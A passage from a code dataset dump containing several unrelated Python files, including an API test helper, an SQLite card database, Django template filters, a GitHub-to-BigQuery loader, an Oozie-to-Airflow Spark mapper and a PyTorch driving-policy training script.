grad = gradfunc(geom)\nprint(grad)\n#hess = hessfunc(geom)\n#print(hess)\n#cube = cubefunc(geom)\n#print(cube)\n#quar = quarfunc(geom)\n#print(quar)\n\n","sub_path":"Quax_dev_archive/quax_misc/hf_loop_tei.py","file_name":"hf_loop_tei.py","file_ext":"py","file_size_in_byte":14096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"240180759","text":"# coding:utf-8\nimport yaml\nimport os\nimport re\nimport json\nimport requests\nfrom libs.share_utils import InsertLog\nfrom libs.share_utils import log\n\n# from string import digits\n\n\ndaily = InsertLog()\n\n\nclass ParseYamlDataClass(object):\n\n    # Get the file path\n    @classmethod\n    def get_path(cls, projectname, apiname, pathname, filelistname='api'):\n        filepath = os.path.abspath(\n            os.path.join(os.path.dirname(__file__), '../{}/{}/{}/{}.yaml'. \\\n                         format(filelistname, projectname, apiname, pathname)))\n        return filepath\n\n    # Get the Swagger API doc info\n    def get_api(self):\n        filepath = self.get_path(apiname='auth', projectname='project', pathname='index',)\n        with open(filepath, encoding='utf-8') as f:\n            detail = yaml.safe_load(f)  # safe_load avoids arbitrary object construction\n        log('swagger detail is', detail)\n        path = (list(detail['paths'].keys()))[0]\n        host = (detail['servers'][0]['url'])\n        url = '{}{}'.format(host, path)\n        methods = list((((detail['paths'])).get(path, None)).keys())[0]\n        if methods is None:\n            methods = 'get'\n        return url, methods\n\n    # Get the API stage request payload\n    def get_api_data(self, filepath,statusvalue):\n        with open(filepath, encoding='utf-8') as f:\n            # Read the yaml file as a dict\n            detail = yaml.safe_load(f)\n        data = list(detail.keys())\n        for i in range(len(data)):\n            if statusvalue in data[i]:\n                # Grab the matching response status\n                status = data[i]\n                # Split out the corresponding status code\n                #code = re.sub('\\D', '', status)\n                # Split out the corresponding status description\n                #description = re.sub('\\d', '', status)\n                break\n                # remove_digits = str.maketrans('', '', digits)\n                # description = status[i].translate(remove_digits)\n        else:\n            status = '200Ok'\n            code = '200'\n            description = 'Ok'\n            log('not found requestdata')\n        requestbody = detail[status][0]\n        requestbody['verify'] = status\n        log('requestbody is', requestbody)\n        return requestbody\n\n
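    # Illustrative note (assumed layouts): get_api() expects a Swagger-style file,\n    # e.g. servers: [{url: https://example-host}] and paths: {/auth/login: {post: ...}},\n    # while get_api_data() expects a mapping from status keys like '200Ok' to a list\n    # of request bodies.\n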
    ## Debugging helper\n    def send_request(self):\n        url, methods = self.get_api()\n        filepath = self.get_path(apiname='auth', projectname='project', pathname='index')  # assumed: mirrors get_api(), since get_api_data() requires a filepath\n        body = self.get_api_data(filepath, '200Ok')\n        verify = body.get('verify', '')\n        body.pop('verify', '')\n        code = re.sub('\\D', '', verify)\n        log(code)\n        # Split out the corresponding status description\n        description = re.sub('\\d', '', verify)\n        log(description)\n        result = requests.post(url=url, data=json.dumps(body), verify=False)\n        log(result.status_code)\n\n\nif __name__ == '__main__':\n    run = ParseYamlDataClass()\n    run.get_api()","sub_path":"magic/libs/share_modules.py","file_name":"share_modules.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"404518668","text":"import os\nimport pickle\n#file chooser GUI. Point to external device directory and ask to import an image\ndef chooseFile(multi=True):\n    import tkinter\n    from tkinter.filedialog import askopenfilenames,askopenfilename\n    print(os.getcwd())\n    path=\"/media/pi\"\n    root=tkinter.Tk() # we don't want a full GUI, so keep the root window from appearing\n    root.withdraw()\n    # show an \"Open\" dialog box and return the path to the selected file\n    if multi:\n        filepath = askopenfilenames(parent=root,initialdir=path,title=\"Select Images\",filetypes=((\"Image Files\",\"*.jpeg;*.png\"), (\"All\",\".\")) )\n    else:\n        filepath = askopenfilename(parent=root,initialdir=path,title=\"Select Images\",filetypes=((\"Image Files\",\"*.jpeg;*.png\"), (\"All\",\".\")) )\n    filepath=root.tk.splitlist(filepath)\n    return filepath\n\nif __name__==\"__main__\":\n    #chooseFile()\n    with open(\"tag\",\"rb\") as f:\n        h=pickle.load(f)\n    for i in h:\n        print(\"%s: %s\"%(i,h[i]) + str(len(set(h[i].split(\";\")))))\n    print(set([1,2,5,4])==set([4,1,2,3]))\n    \n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"114266426","text":"def HasSubtree(pRoot1, pRoot2):\n    if pRoot1 is None or pRoot2 is None:\n        return False\n    def firstvisit(root):\n        visitlist = ''\n        # delimit values with ',' so multi-digit values cannot create false substring matches\n        visitlist += str(root.val) + ','\n        if root.left is not None:\n            visitlist += firstvisit(root.left)\n        if root.right is not None:\n            visitlist += firstvisit(root.right)\n        return visitlist\n\n    pfirstlist1 = firstvisit(pRoot1)\n    pfirstlist2 = firstvisit(pRoot2)\n\n    if pfirstlist2 in pfirstlist1:\n        return True\n    else:\n        return False","sub_path":"树的子结构/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"132136912","text":"from flickr_rust import *\n\nflickr_rustSetId = 72157623812855325\nflickr_nonrustGroupId = '54054161@N00'#\"shinymetalthings\"\n\nif __name__==\"__main__\":\n\t#Downloads from keywords\n\tflickr_walk(keyword=\"cats\",limit=20)\n\n\t#Download from shiny metal things\n\t#flickr_group(keyword=\"\",limit=100,group_id=flickr_nonrustGroupId)\n\t#Downloads Rust Image Set\n\t#flickr_set(limit=100,set_id=flickr_rustSetId)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"198115329","text":"import sqlite3\nimport csv\n\nDB_NAME = 'mtg_cards.db'\n\ndb = sqlite3.Connection(DB_NAME)\ncur = db.cursor()\n\n\ndef _init_db():\n    cur.execute(\"\"\"CREATE TABLE CARDS (CARD_NAME TEXT, PRICE_EUR NUMBER,\n    PRICE_USD NUMBER, QTY NUMBER)\"\"\")\n    cur.execute(\"CREATE UNIQUE INDEX I1 ON CARDS (CARD_NAME)\")\n    db.commit()\n\n\ndef _drop_db():\n    try:\n        cur.execute(\"DROP INDEX I1\")\n        cur.execute(\"DROP TABLE CARDS\")\n    except sqlite3.OperationalError as e:\n        print(\"WARN : {}\".format(e))\n\n\ndef _reset_db():\n    _drop_db()\n    _init_db()\n\n\ndef card_exists(card_name):\n    res = cur.execute(\"SELECT 1 FROM CARDS WHERE CARD_NAME == :card_name\",\n                      {'card_name': card_name})\n\n    return True if res.fetchone() else False\n\n\ndef insert_card(card_name, price_eur, price_usd, qty=1):\n    cur.execute(\"\"\"INSERT INTO CARDS (CARD_NAME, PRICE_EUR, PRICE_USD\n    , QTY) VALUES (:card_name, :price_eur, :price_usd, :qty)\n    \"\"\", {'card_name': card_name, 'price_eur': price_eur,\n          'price_usd': price_usd, 'qty': qty})\n    db.commit()\n\n\ndef update_card_qty(card_name, 
qty=1):\n    cur.execute(\"\"\"UPDATE CARDS SET QTY = QTY + :nb_cards WHERE\n    CARD_NAME = :card_name\"\"\", {'card_name': card_name,\n                                'nb_cards': qty})\n    db.commit()\n\n\ndef export_cards_as_csv(csv_name):\n    data = cur.execute(\"SELECT * FROM CARDS\")\n    with open(csv_name, 'w', newline='') as f:\n        writer = csv.writer(f, delimiter=';')  # Excel style\n        writer.writerow([i[0] for i in data.description])\n        writer.writerows(data)\n\n\nif __name__ == '__main__':\n    import argparse\n    parser = argparse.ArgumentParser()\n    group = parser.add_mutually_exclusive_group(required=True)\n    group.add_argument('-init', action='store_true',\n                       help='Initialize the database')\n    group.add_argument('-drop', action='store_true',\n                       help='Drop all tables in database')\n    group.add_argument('-reset', action='store_true',\n                       help='Reset database to the initial state')\n    args = parser.parse_args()\n\n    if args.drop:\n        _drop_db()\n        print(\"Database properly dropped\")\n    elif args.init:\n        _init_db()\n        print(\"Database properly initiated\")\n    elif args.reset:\n        _reset_db()\n        print(\"Database properly reset\")\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"386506319","text":"# coding: utf-8\n\nimport os\n\nfrom django import template\nfrom django.template.defaultfilters import filesizeformat\nfrom django.utils.safestring import mark_safe\nfrom bootstrapform.templatetags.bootstrap import bootstrap_inline as bootstrapform_bootstrap_inline\nfrom bootstrapform.templatetags.bootstrap import bootstrap_horizontal as bootstrapform_bootstrap_horizontal\nfrom django.utils.translation import ugettext as _\n\nregister = template.Library()\n\n\ndef _convert_selects_to_bootstrap(out):\n    if ''\n    icon_false = u'\"False\"'\n    icon_unknown = u'\"None\"'\n    if icon_true in element:\n        element = element.replace(icon_true, u'%s' % _(u'Yes'))\n    elif icon_false in element:\n        element = element.replace(icon_false, u'%s' % _(u'No'))\n    elif icon_unknown in element:\n        element = element.replace(icon_unknown, u'Empty')\n    \n    return mark_safe(element)\n\n\n@register.filter\ndef format(element):\n    icon_true = u'\"True\"'\n    icon_false = u'\"False\"'\n    icon_unknown = u'\"None\"'\n    if icon_true in element:\n        element = element.replace(icon_true, u'%s' % _(u'Yes'))\n    elif icon_false in element:\n        element = element.replace(icon_false, u'%s' % _(u'No'))\n    elif icon_unknown in element:\n        element = element.replace(icon_unknown, u'%s' % _(u'Unknown'))\n    return mark_safe(element)\n\n\n@register.filter\ndef filename(path):\n    return os.path.split(path)[-1]\n\n@register.filter\ndef field_filesizeformat(field):\n    \"\"\"Filter created to avoid an OSError when the file does not exist on disk, which is\n    common in the development environment\"\"\"\n    try:\n        return filesizeformat(field.size)\n    except OSError:\n        return u''\n\n\n@register.filter\ndef getval(value, key):\n    try:\n        return value[key]\n    except TypeError:\n        return getattr(value, key)\n\n\n
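# Usage note for the filter below: {{ version|show_version_diff }} renders each\n# changed field of a reversion Version as \"field: old value -> new value\" against\n# its immediate predecessor, or 'Initial version' when no earlier revision exists.\n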
@register.filter\ndef show_version_diff(version):\n    import json\n    import reversion\n    try:\n        previous_version = reversion.get_for_object(version.object).filter(\n            revision__date_created__lt=version.revision.date_created).order_by('-revision__date_created')[0]\n    except IndexError:\n        return u'Initial version'\n\n    old = json.loads(previous_version.serialized_data)[0]['fields']\n    new = json.loads(version.serialized_data)[0]['fields']\n\n    out = [u'<ul>']\n    keys = set(old.keys() + new.keys())\n    for key in sorted(keys):\n        old_value, new_value = old.get(key, ''), new.get(key, '')\n        if old_value != new_value:\n            out.append(u'<li>%s: %s &rarr; '\n                       u'%s</li>' % (key, old_value, new_value))\n    out.append(u'</ul>')\n    return mark_safe(u''.join(out))\n\n@register.filter\ndef validjs_symbol(str):\n    return str.replace(\"-\", \"\")","sub_path":"newadmin/templatetags/newadmin.py","file_name":"newadmin.py","file_ext":"py","file_size_in_byte":4786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"116492694","text":"\"\"\"\nCreate a function that, given a number and a range, says whether the number falls inside the range or not\n\"\"\"\n\ndef rango(numero, rango1, rango2):\n    if numero >= rango1 and numero <= rango2:\n        resultado = True\n    else:\n        resultado = False\n    return resultado\n\nmi_numero = rango(3, 3, 9)\n\nprint(\"{}\".format(mi_numero))","sub_path":"ejercicio_20.py","file_name":"ejercicio_20.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"126182913","text":"import argparse\n\nfrom bigquery import get_client\n\nfrom gh_api import curr_commit_master\nfrom gh_api import get_language_bytes\nfrom util import curr_time_utc\nfrom util import delete_bq_table, create_bq_table, push_bq_records\nfrom util import get_repo_names\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--json_key', action = 'store', dest = 'json_key', required = True, \n                    help = 'JSON key file for BigQuery dataset')\nparser.add_argument('--ds', action = 'store', dest = 'ds', required = True, \n                    help = 'BigQuery dataset to write table to')\nparser.add_argument('--table', action = 'store', dest = 'table', required = True, \n                    help = 'BigQuery table to write to')\nparser.add_argument('--sheet', action = 'store', dest = 'sheet', required = True, \n                    help = 'Google Sheet with use_repo as a column')\nparser.add_argument('--gh_user', action = 'store', dest = 'gh_username', required = True, \n                    help = 'GitHub username for API')\nparser.add_argument('--gh_oauth_key', action = 'store', dest = 'gh_oauth_key', required = True, \n                    help = '(String) GitHub oauth key')\nargs = parser.parse_args()\n \ndataset = args.ds\njson_key = args.json_key\ntable = args.table\nsheet = args.sheet\ngh_username = args.gh_username\ngh_oauth_key = args.gh_oauth_key\n \n# Get repo names\nprint(\"Getting repo names from spreadsheet\")\nrepos = get_repo_names(sheet, json_key)\nprint(\"There are %s repos with use_repo = 1.\\n\" % len(repos))\n\n# Using BigQuery-Python https://github.com/tylertreat/BigQuery-Python\nprint('\\nGetting BigQuery client\\n')\nclient = get_client(json_key_file=json_key, readonly=False, swallow_results=True)\n \n# Delete the output table if it exists\ndelete_bq_table(client, dataset, table)\n \n# Create the output table\nschema = [\n    {'name': 'repo_name', 'type': 'STRING', 'mode': 'NULLABLE'},\n    {'name': 'language_name', 'type': 'STRING', 'mode': 'NULLABLE'},\n    {'name': 'language_bytes', 'type': 'INTEGER', 'mode': 'NULLABLE'},\n    {'name': 'curr_commit_master', 'type': 'STRING', 'mode': 'NULLABLE'},\n    {'name': 'time_accessed', 'type': 'STRING', 'mode': 'NULLABLE'}\n]\ncreate_bq_table(client, dataset, table, schema)\n\n# Get list of language records for a repo\ndef get_records(repo_name):\n    data = get_language_bytes(repo_name, gh_username, gh_oauth_key)\n    curr_time = curr_time_utc()\n    curr_commit = curr_commit_master(repo_name, gh_username, gh_oauth_key)\n    return [{'repo_name': repo_name, \n             'language_name': key, \n             'language_bytes': data[key],\n             'curr_commit_master': curr_commit,\n             'time_accessed': curr_time} for key in data.keys()]\n \nprint(\"Getting language info from GitHub API\")\n
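# Records are pushed to BigQuery in batches: every 100 repos the buffered rows are\n# flushed with push_bq_records and the buffer is cleared; the final push after the\n# loop writes whatever remains in the last partial batch.\n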
records = []\nnum_done = 0\nfor repo_name in repos:\n    try:\n        for record in get_records(repo_name):\n            records.append(record)\n    except UnicodeEncodeError:\n        print(\"Skipping repo %s\" % repo_name)\n    num_done = num_done + 1\n    if num_done % 100 == 0:\n        print(\"Finished %s repos. Pushing records.\" % num_done)\n        push_bq_records(client, dataset, table, records)\n        records.clear()\npush_bq_records(client, dataset, table, records) # Last batch\n\n\n\n\n","sub_path":"src/python/gh_api_languages.py","file_name":"gh_api_languages.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"519299012","text":"# -*- coding: utf-8 -*-\n# Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#      http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Maps Spark action to Airflow Dag\"\"\"\nfrom typing import Dict, Set, List, Optional\n\nimport xml.etree.ElementTree as ET\n\nfrom airflow.utils.trigger_rule import TriggerRule\n\nfrom o2a.converter.exceptions import ParseException\nfrom o2a.converter.task import Task\nfrom o2a.converter.relation import Relation\nfrom o2a.mappers.action_mapper import ActionMapper\nfrom o2a.mappers.prepare_mixin import PrepareMixin\nfrom o2a.utils import xml_utils, el_utils\nfrom o2a.utils.file_archive_extractors import FileExtractor, ArchiveExtractor\n\n\n# pylint: disable=too-many-instance-attributes\nSPARK_TAG_VALUE = \"value\"\nSPARK_TAG_NAME = \"name\"\nSPARK_TAG_ARGS = \"arg\"\nSPARK_TAG_OPTS = \"spark-opts\"\nSPARK_TAG_CONFIGURATION = \"configuration\"\nSPARK_TAG_JOB_XML = \"job-xml\"\nSPARK_TAG_JOB_NAME = \"name\"\nSPARK_TAG_CLASS = \"class\"\nSPARK_TAG_JAR = \"jar\"\n\n\nclass SparkMapper(ActionMapper, PrepareMixin):\n    \"\"\"Maps Spark Action\"\"\"\n\n    def __init__(\n        self,\n        oozie_node: ET.Element,\n        name: str,\n        trigger_rule: str = TriggerRule.ALL_SUCCESS,\n        params: Dict[str, str] = None,\n        **kwargs,\n    ):\n        ActionMapper.__init__(self, oozie_node=oozie_node, name=name, trigger_rule=trigger_rule, **kwargs)\n        self.params = params or {}\n        self.java_class = \"\"\n        self.java_jar = \"\"\n        self.job_name: Optional[str] = None\n        self.jars: List[str] = []\n        self.properties: Dict[str, str] = {}\n        self.application_args: List[str] = []\n        self.file_extractor = FileExtractor(oozie_node=oozie_node, params=self.params)\n        self.archive_extractor = ArchiveExtractor(oozie_node=oozie_node, params=self.params)\n        self.prepare_command = None\n        self.hdfs_files: List[str] = []\n        self.hdfs_archives: List[str] = []\n        self.dataproc_jars: List[str] = []\n\n    def on_parse_node(self):\n\n        # has_prepare is a method (see its call in _get_tasks below); a bare\n        # `if self.has_prepare:` would always be truthy\n        if self.has_prepare(self.oozie_node):\n            self.prepare_command = self.get_prepare_command(oozie_node=self.oozie_node, params=self.params)\n\n        _, self.hdfs_files = self.file_extractor.parse_node()\n        _, self.hdfs_archives = self.archive_extractor.parse_node()\n\n        self.java_jar = self._get_or_default(self.oozie_node, SPARK_TAG_JAR, None, params=self.params)\n        self.java_class = self._get_or_default(self.oozie_node, SPARK_TAG_CLASS, None, params=self.params)\n        if self.java_class and 
self.java_jar:\n self.dataproc_jars = [self.java_jar]\n self.java_jar = None\n self.job_name = self._get_or_default(self.oozie_node, SPARK_TAG_JOB_NAME, None, params=self.params)\n\n job_xml_nodes = xml_utils.find_nodes_by_tag(self.oozie_node, SPARK_TAG_JOB_XML)\n\n for xml_file in job_xml_nodes:\n tree = ET.parse(source=xml_file.text)\n self.properties.update(self._parse_config_node(tree.getroot()))\n\n config_nodes = xml_utils.find_nodes_by_tag(self.oozie_node, SPARK_TAG_CONFIGURATION)\n if config_nodes:\n self.properties.update(self._parse_config_node(config_nodes[0]))\n\n spark_opts = xml_utils.find_nodes_by_tag(self.oozie_node, SPARK_TAG_OPTS)\n if spark_opts:\n self.properties.update(self._parse_spark_opts(spark_opts[0]))\n\n app_args = xml_utils.find_nodes_by_tag(self.oozie_node, SPARK_TAG_ARGS)\n for arg in app_args:\n self.application_args.append(el_utils.replace_el_with_var(arg.text, self.params, quote=False))\n\n @staticmethod\n def _get_or_default(root: ET.Element, tag: str, default: str = None, params: Dict[str, str] = None):\n \"\"\"\n If a node exists in the oozie_node with the tag specified in tag, it\n will attempt to replace the EL (if it exists) with the corresponding\n variable. If no EL var is found, it just returns text. However, if the\n tag is not found under oozie_node, then return default. If there are\n more than one with the specified tag, it uses the first one found.\n \"\"\"\n var = xml_utils.find_nodes_by_tag(root, tag)\n\n if var:\n # Only check the first one\n return el_utils.replace_el_with_var(var[0].text, params=params, quote=False)\n return default\n\n @staticmethod\n def _parse_config_node(config_node: ET.Element) -> Dict[str, str]:\n conf_dict = {}\n for prop in config_node:\n name_node = prop.find(SPARK_TAG_NAME)\n value_node = prop.find(SPARK_TAG_VALUE)\n if name_node is not None and name_node.text and value_node is not None and value_node.text:\n conf_dict[name_node.text] = value_node.text\n return conf_dict\n\n @staticmethod\n def _parse_spark_opts(spark_opts_node: ET.Element):\n \"\"\"\n Some examples of the spark-opts element:\n --conf key1=value\n --conf key2=\"value1 value2\"\n \"\"\"\n conf: Dict[str, str] = {}\n if spark_opts_node.text:\n spark_opts = spark_opts_node.text.split(\"--\")[1:]\n else:\n raise ParseException(\"Spark opts node has no text: {}\".format(spark_opts_node))\n clean_opts = [opt.strip() for opt in spark_opts]\n clean_opts_split = [opt.split(maxsplit=1) for opt in clean_opts]\n\n for spark_opt in clean_opts_split:\n # Can have multiple \"--conf\" in spark_opts\n if spark_opt[0] == \"conf\":\n key, _, value = spark_opt[1].partition(\"=\")\n # Value is required\n if not value:\n raise ParseException(\n f\"Incorrect parameter format. Expected format: key=value. 
Current value: {spark_opt}\"\n )\n # Delete surrounding quotes\n if len(value) > 2 and value[0] in [\"'\", '\"'] and value:\n value = value[1:-1]\n conf[key] = value\n\n return conf\n\n def _get_tasks(self):\n \"\"\"\n Returns the list of Airflow tasks that are the result of mapping\n\n :return: list of Airflow tasks\n \"\"\"\n action_task = Task(\n task_id=self.name,\n template_name=\"spark.tpl\",\n trigger_rule=self.trigger_rule,\n template_params=dict(\n main_jar=self.java_jar,\n main_class=self.java_class,\n arguments=self.application_args,\n archives=self.hdfs_archives,\n files=self.hdfs_files,\n job_name=self.job_name,\n dataproc_spark_properties=self.properties,\n dataproc_spark_jars=self.dataproc_jars,\n ),\n )\n\n if not self.has_prepare(self.oozie_node):\n return [action_task]\n\n prepare_task = Task(\n task_id=self.name + \"_prepare\",\n template_name=\"prepare.tpl\",\n template_params=dict(prepare_command=self.prepare_command),\n )\n return [prepare_task, action_task]\n\n def _get_relations(self):\n \"\"\"\n Returns the list of Airflow relations that are the result of mapping\n\n :return: list of relations\n \"\"\"\n return (\n [Relation(from_task_id=self.name + \"_prepare\", to_task_id=self.name)]\n if self.has_prepare(self.oozie_node)\n else []\n )\n\n def to_tasks_and_relations(self):\n tasks = self._get_tasks()\n relations = self._get_relations()\n return tasks, relations\n\n def required_imports(self) -> Set[str]:\n # Bash are for the potential prepare statement\n return {\n \"from airflow.contrib.operators import dataproc_operator\",\n \"from airflow.operators import bash_operator\",\n \"from airflow.operators import dummy_operator\",\n }\n\n @property\n def first_task_id(self):\n return self._get_tasks()[0].task_id\n","sub_path":"o2a/mappers/spark_mapper.py","file_name":"spark_mapper.py","file_ext":"py","file_size_in_byte":8376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"154193333","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\nfrom torchvision import datasets, transforms\r\nfrom torch.utils.data import Dataset, DataLoader\r\nimport argparse\r\nimport time\r\nimport os\r\nfrom dataset_loader import DrivingDataset\r\nfrom driving_policy import OriginalDrivingPolicyDropOut, RecurrentNetworkDropOut, AttentionNetworkDropOut, RecurrentAttentionDropOut\r\nfrom driving_policy import OriginalDrivingPolicy, RecurrentNetwork, AttentionNetwork, RecurrentAttention\r\nfrom utils import DEVICE, str2bool\r\nimport matplotlib.pyplot as plt\r\n\r\ndef parse_args():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--lr\", type=float, help=\"learning rate\", default=1e-3)\r\n parser.add_argument(\"--n_epochs\", type=int, help=\"number of epochs\", default=50)\r\n parser.add_argument(\"--batch_size\", type=int, help=\"batch_size\", default=256)\r\n parser.add_argument(\"--n_steering_classes\", type=int, help=\"number of steering classes\", default=20)\r\n parser.add_argument(\"--train_dir\", help=\"directory of training data\", default='./dataset/train')\r\n parser.add_argument(\"--validation_dir\", help=\"directory of validation data\", default='./dataset/val')\r\n parser.add_argument(\"--weights_out_file\", help=\"where to save the weights of the network e.g. 
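The _parse_spark_opts helper in the spark_mapper.py record above splits the <spark-opts> text on "--" and keeps only "conf key=value" pairs. A minimal standalone sketch of that parsing idea, assuming nothing from the o2a package (the function name and sample input here are illustrative only):

def parse_spark_opts(text):
    # split "--conf key1=value --conf key2='v1 v2'" on "--" and keep conf pairs
    conf = {}
    for opt in text.split("--")[1:]:
        name, _, rest = opt.strip().partition(" ")
        if name == "conf":
            key, _, value = rest.strip().partition("=")
            # drop surrounding quotes, mirroring the mapper above
            if len(value) > 2 and value[0] in ("'", '"') and value[-1] == value[0]:
                value = value[1:-1]
            conf[key] = value
    return conf

print(parse_spark_opts('--conf key1=value --conf key2="value1 value2"'))
# {'key1': 'value', 'key2': 'value1 value2'}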
./weights/learner_0.weights\",\r\n                        required=True)\r\n    parser.add_argument(\"--weighted_loss\", type=str2bool,\r\n                        help=\"should you weight the labeled examples differently based on their frequency of occurrence\",\r\n                        default=False)\r\n    parser.add_argument(\"--policy\", type=str, default='OriginalDrivingPolicy',\r\n                        help=\"driving policy of choice e.g. OriginalDrivingPolicy, RecurrentNetwork, AttentionNetwork or RecurrentAttention\")\r\n    parser.add_argument(\"--output_log\", type=str2bool, help=\"whether to output network logs\", default=False)\r\n    parser.add_argument(\"--is_l2\", type=str2bool, help=\"whether to do L2 regularization\", default=False)\r\n    parser.add_argument(\"--wd\", type=float, help=\"weight decay rate\", default=0.0005)\r\n    parser.add_argument(\"--is_dropout\", type=str2bool, help=\"whether to use Drop Out Regularization\", default=False)\r\n    return parser\r\n\r\n\r\ndef train_discrete(model, iterator, opt, args):\r\n    model.train()\r\n\r\n\r\n    loss_hist = []\r\n\r\n    params = model.state_dict()\r\n\r\n    # Do one pass over the data accessed by the training iterator\r\n    # Upload the data in each batch to the GPU (if applicable)\r\n    # Zero the accumulated gradient in the optimizer\r\n    # Compute the cross_entropy loss with and without weights\r\n    # Compute the derivatives of the loss w.r.t. network parameters\r\n    # Take a step in the approximate gradient direction using the optimizer opt\r\n    print(\"Training Full Driving Policy Network...\")\r\n    for i_batch, batch in enumerate(iterator):\r\n        x = batch['image']\r\n        y = batch['cmd']\r\n\r\n        x = x.to(DEVICE)\r\n        y = y.to(DEVICE)\r\n\r\n\r\n        if (args.weighted_loss == True):\r\n            class_weights = torch.FloatTensor(args.class_dist).cuda()\r\n            criterion = nn.CrossEntropyLoss(weight=class_weights)\r\n        else:\r\n            criterion = nn.CrossEntropyLoss()\r\n\r\n        #\r\n        # YOUR CODE GOES HERE\r\n\r\n        pred = model(x)\r\n        opt.zero_grad()\r\n        loss = criterion(pred,y)\r\n        loss.backward()\r\n        opt.step()\r\n\r\n        #\r\n\r\n        loss = loss.detach().cpu().numpy()\r\n        loss_hist.append(loss)\r\n        PRINT_INTERVAL = int(len(iterator) / 3)\r\n        if (i_batch + 1) % PRINT_INTERVAL == 0:\r\n            print ('\\tIter [{}/{} ({:.0f}%)]\\tLoss: {}\\t Time: {:10.3f}'.format(\r\n                i_batch, len(iterator),\r\n                i_batch / len(iterator) * 100,\r\n                np.asarray(loss_hist)[-PRINT_INTERVAL:].mean(0),\r\n                time.time() - args.start_time,\r\n            ))\r\n\r\n    # I added this\r\n    avg_loss = np.asarray(loss_hist).mean()\r\n    return avg_loss\r\n\r\ndef accuracy(y_pred, y_true):\r\n    \"y_true is (batch_size) and y_pred is (batch_size, K)\"\r\n    _, y_max_pred = y_pred.max(1)\r\n    correct = ((y_true == y_max_pred).float()).mean()\r\n    acc = correct * 100\r\n    return acc\r\n\r\n\r\ndef test_discrete(model, iterator, opt, args):\r\n    model.eval()  # eval mode so dropout is disabled while measuring validation accuracy\r\n\r\n    acc_hist = []\r\n\r\n    for i_batch, batch in enumerate(iterator):\r\n        x = batch['image']\r\n        y = batch['cmd']\r\n\r\n        x = x.to(DEVICE)\r\n        y = y.to(DEVICE)\r\n        logits = model(x)\r\n        y_pred = F.softmax(logits, 1)\r\n        acc = accuracy(y_pred, y)\r\n        acc = acc.detach().cpu().numpy()\r\n        acc_hist.append(acc)\r\n\r\n    avg_acc = np.asarray(acc_hist).mean()\r\n\r\n\r\n    print ('\\tVal: \\tAcc: {} Time: {:10.3f}'.format(\r\n        avg_acc,\r\n        time.time() - args.start_time,\r\n    ))\r\n\r\n    return avg_acc\r\n\r\ndef get_class_distribution(iterator, args):\r\n    class_dist = np.zeros((args.n_steering_classes,), dtype=np.float32)\r\n    for i_batch, batch in enumerate(iterator):\r\n        y = batch['cmd'].detach().numpy().astype(np.int32)\r\n        class_dist[y] += 1\r\n\r\n    return (class_dist / 
sum(class_dist))\r\n\r\n\r\n\r\ndef main(args,driving_policy=None):\r\n train_loss = []\r\n test_acc = []\r\n\r\n data_transform = transforms.Compose([ transforms.ToPILImage(),\r\n transforms.ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\r\n transforms.RandomRotation(degrees=80),\r\n transforms.ToTensor()])\r\n\r\n training_dataset = DrivingDataset(root_dir=args.train_dir,\r\n categorical=True,\r\n classes=args.n_steering_classes,\r\n transform=data_transform)\r\n\r\n validation_dataset = DrivingDataset(root_dir=args.validation_dir,\r\n categorical=True,\r\n classes=args.n_steering_classes,\r\n transform=data_transform)\r\n\r\n training_iterator = DataLoader(training_dataset, batch_size=args.batch_size, shuffle=True, num_workers=1)\r\n validation_iterator = DataLoader(validation_dataset, batch_size=args.batch_size, shuffle=True, num_workers=1)\r\n if (driving_policy == None):\r\n print(\"New policy instantiated.\")\r\n if args.policy == 'OriginalDrivingPolicy':\r\n driving_policy = OriginalDrivingPolicy(n_classes=args.n_steering_classes).to(DEVICE)\r\n elif args.policy == 'RecurrentNetwork':\r\n driving_policy = RecurrentNetwork(n_classes=args.n_steering_classes).to(DEVICE)\r\n elif args.policy == 'AttentionNetwork':\r\n driving_policy = AttentionNetwork(n_classes=args.n_steering_classes).to(DEVICE)\r\n elif args.policy == 'RecurrentAttention':\r\n driving_policy = RecurrentAttention(n_classes=args.n_steering_classes).to(DEVICE)\r\n\r\n if args.policy == 'OriginalDrivingPolicyDropOut':\r\n driving_policy = OriginalDrivingPolicyDropOut(n_classes=args.n_steering_classes).to(DEVICE)\r\n elif args.policy == 'RecurrentNetworkDropOut':\r\n driving_policy = RecurrentNetworkDropOut(n_classes=args.n_steering_classes).to(DEVICE)\r\n elif args.policy == 'AttentionNetworkDropOut':\r\n driving_policy = 